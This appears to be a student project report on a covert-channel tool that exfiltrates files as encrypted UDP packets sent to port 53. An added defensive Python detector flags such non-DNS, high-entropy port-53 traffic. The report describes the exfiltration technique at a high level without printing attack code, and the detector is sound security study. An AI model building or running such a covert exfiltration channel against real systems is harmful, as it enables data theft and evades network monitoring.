This project successfully demonstrated exfiltration of a file from a compromised machine over a covert channel. The attacker was able to specify a file on the compromised machine and receive a copy of the file via 128-byte packets sent at random intervals using the UDP protocol to port 53 on the attacker's local machine. These packets were encrypted with a shared password known only by the attacker and the application running on the compromised machine.

Complete source code, log files, and Wireshark packet capture files are included on the accompanying DVD for confirmation of design work and evidence of test results. A GNU/Linux 64-bit executable ./invizible file is also included on the accompanying DVD.
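A defender's view of the traffic profile summarized above, as an added Python example that is not part of the original report or the invizible source: it groups UDP datagrams sent to port 53 by source and destination and flags flows whose payloads do not parse as DNS, share one fixed size, and have high byte entropy. The record format, thresholds, helper names and sample data are constructed assumptions; the report does not say whether 128 bytes is the payload or the whole packet, so the sample treats it as the payload size.

```python
import math
import struct
from collections import Counter, defaultdict

# Thresholds are assumptions chosen for this example, not values from the report.
MIN_DATAGRAMS = 5     # flows shorter than this are not judged
NON_DNS_RATIO = 0.9   # share of port-53 payloads that must fail DNS parsing
MIN_ENTROPY = 6.0     # mean bits per byte; ciphertext sits well above DNS names


def parses_as_dns(payload: bytes) -> bool:
    """Structural check: RFC 1035 header plus exactly one well-formed question."""
    if len(payload) < 12:
        return False
    _txid, flags, qd, an, ns, ar = struct.unpack("!6H", payload[:12])
    if ((flags >> 11) & 0xF) > 5 or qd != 1:   # unassigned opcode, or not one question
        return False
    off = 12
    while True:                                 # walk the QNAME labels
        if off >= len(payload):
            return False
        length = payload[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:                       # pointer or over-long label in a question
            return False
        off += length
    off += 4                                    # QTYPE and QCLASS
    if off > len(payload):
        return False
    # With no answer/authority/additional records the message must end here.
    return not (an == ns == ar == 0 and off != len(payload))


def byte_entropy(payload: bytes) -> float:
    """Shannon entropy of the byte histogram, in bits per byte."""
    n = len(payload)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(payload).values())


def find_suspect_flows(records):
    """records: iterable of (ts_seconds, src_ip, dst_ip, udp_dport, payload_bytes)."""
    flows = defaultdict(list)
    for ts, src, dst, dport, payload in records:
        if dport == 53:
            flows[(src, dst)].append((ts, payload))
    findings = []
    for (src, dst), pkts in sorted(flows.items()):
        if len(pkts) < MIN_DATAGRAMS:
            continue
        pkts.sort(key=lambda p: p[0])
        payloads = [p for _, p in pkts]
        non_dns = sum(not parses_as_dns(p) for p in payloads) / len(payloads)
        sizes = {len(p) for p in payloads}
        entropy = sum(map(byte_entropy, payloads)) / len(payloads)
        gaps = [b[0] - a[0] for a, b in zip(pkts, pkts[1:])]
        if non_dns >= NON_DNS_RATIO and len(sizes) == 1 and entropy >= MIN_ENTROPY:
            findings.append({
                "src": src, "dst": dst, "datagrams": len(pkts),
                "payload_size": sizes.pop(), "non_dns_ratio": non_dns,
                "mean_entropy": round(entropy, 2),
                "min_gap": min(gaps), "max_gap": max(gaps),  # for analyst triage
            })
    return findings


def build_query(txid: int, name: str) -> bytes:
    """Constructed sample data: a minimal, valid DNS A query."""
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
    return struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!2H", 1, 1)


def sample_records():
    """Constructed records; the first flow reuses the lab addresses from the test runs."""
    recs, ts = [], 0.0
    for k, gap in enumerate([0, 3, 7, 12, 5, 9, 4, 11]):    # gaps inside 3-12 s
        ts += gap
        # Stand-in for a 128-byte encrypted payload: 128 distinct byte values.
        blob = bytes((i * 37 + 13 * k + 7) % 256 for i in range(128))
        recs.append((ts, "192.168.0.199", "192.168.0.193", 53, blob))
    names = ["www.example.com", "mail.example.org", "example.net",
             "ntp.example.com", "cdn.example.org", "api.example.net"]
    for k, name in enumerate(names):                         # ordinary resolver traffic
        recs.append((k * 0.4, "192.168.0.50", "192.168.0.1", 53,
                     build_query(0x1000 + k, name)))
    return recs


if __name__ == "__main__":
    for finding in find_suspect_flows(sample_records()):
        print(finding)
```

On real captures the same checks also surface legitimate non-DNS uses of UDP port 53, so findings are triage leads that need allow-listing rather than verdicts.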

Appendix

The following files are included on the accompanying DVD:

/ root directory:
    COMP8505_FinalProject_final.docx    (this file)
    COMP8505_FinalProject_final.doc     (doc version of this file)
    COMP8505_FinalProject_final.pdf     (pdf version of this file)
    FinalProject11.pdf                  (copy of project description)
    *.packet                            (packet files from client and server testing)
    *.pcap                              (various Wireshark packet capture files)

/bin/x86_64
    invizible       (64-bit GNU-Linux executable)

/bin/x86
    invizible       (32-bit GNU-Linux executable)

/src/ directory:
    common.h        (c header file for common functions)
    pkclient.h      (c header file for port knocking client functions)
    pkcommon.h      (c header file for port knocking common functions)
    pkserver.h      (c header file for port knocking server functions)
    hostnames.h     (c header file for hostnames functions)
    hpingwrap.h     (c header file for embedded hping)
    invizible.h     (c header file for invizible functions)
    libevwrap.h     (c header file for embedded libev)
    mypcap.h        (c header file for customized pcap functions)
    parms.h         (c header file for parameter functions)
    common.c        (c source file for common functions)
    pkclient.c      (c source file for port knocking client functions)
    pkcommon.c      (c source file for port knocking common functions)
    pkserver.c      (c source file for port knocking server functions)
    hostnames.c     (c source file for hostnames functions)
    hpingwrap.c     (c source file for embedded hping)
    invizible.c     (c source file for invizible functions)
    libevwrap.c     (c source file for embedded libev)
    main.c          (c main source file)
    mypcap.c        (c source file for customized pcap functions)
    parms.c         (c source file for parameter functions)
    INSTALL         (notes and instructions on installation)
    LICENSE         (license and copyright statements)
    TODO            (list of outstanding and planned items)

/src/fwknop directory:    (embedded and modified fwknop headers)
/src/hping directory:     (embedded hping headers and source)
/src/lib directory:       (libpcap and libfko libraries not used)
/src/libev directory:     (embedded libev headers and source)
/src/pcap directory:      (embedded subset of libpcap headers and source)

Bibliography

[1] invizible open source project available on Launchpad.net web site at https://launchpad.net/invizible.
[2] User Datagram Protocol discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/User_Datagram_Protocol as of June 19, 2011.
[3] libpcap discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Libpcap as of June 19, 2011.
[4] The open source libpcap library is available, and documented, at the tcpdump.org web site at http://www.tcpdump.org as of May 29, 2011. The Microsoft Windows port of libpcap is available from the winpcap.org web site at http://www.winpcap.org as of May 29, 2011.
[5] The open source fwknop project is available, and documented, at the cipherdyne.org web site at http://www.cipherdyne.org/fwknop as of May 29, 2011.
[6] AES Advanced Encryption Standard discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Rijndael as of June 19, 2011.
[7] SHA-2 discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Sha256 as of June 19, 2011.
[8] Replay attack discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Replay_attack as of June 19, 2011.
[9] inotify discussed on Wikipedia.org web site at http://en.wikipedia.org/wiki/Inotify as of June 20, 2011.

Credits

Linux is a registered trademark of Linus Torvalds.

libpcap examples Copyright (c) Martin Casado & Richard Stevens and Aman Abdulla: April 23, 2006

Covert_TCP 1.0 - Covert channel file transfer for Linux. Written by Craig H. Rowland (crowland@psionic.com). Copyright 1996 Craig H. Rowland (11-15-96). NOT FOR COMMERCIAL USE WITHOUT PERMISSION.

libev Copyright (c) 2007,2008,2009 Marc Alexander Lehmann

bind Copyright (c) 2004-2011 Internet Systems Consortium, Inc. ("ISC") and Copyright (c) 1996-2003 Internet Software Consortium. and Portions Copyright (c) 1996-2001 Nominum, Inc.

hping3 Copyright (c) 1999 Salvatore Sanfilippo <antirez@invece.org>; license: This software is under GPL version 2 of license

eventdns Version: 0.1b developed by Adam Langley <agl@imperialviolet.org>

libevent evdns Copyright (c) 2000-2007 Niels Provos <provos@citi.umich.edu> and Copyright (c) 2007-2010 Niels Provos and Nick Mathewson

fwknop Copyright (c) 2009 Damien S. Stuart (dstuart@dstuart.org) and Copyright (c) Michael Rash (mbr@cipherdyne.org)

md5.c implementation of the MD5 message-digest algorithm due to Ron Rivest. Code written by Colin Plumb in 1993, with no copyright claimed.

sha1.c based on NIST Secure Hash Algorithm, heavily modified by Uwe Hollerbach <uh@alumni.caltech.edu> and based on Peter C. Gutmann's implementation as found in Applied Cryptography by Bruce Schneier

rijndael.c implementation of the Rijndael cipher Copyright (C) 2000, 2001 Rafael R. Sevilla <sevillar@team.ph.inter.net> and currently maintained by brian d foy, <bdfoy@cpan.org>

sha2.c by Aaron D. Gifford - http://www.aarongifford.com/ Copyright (c) 2000-2001, Aaron D. Gifford. All rights reserved.
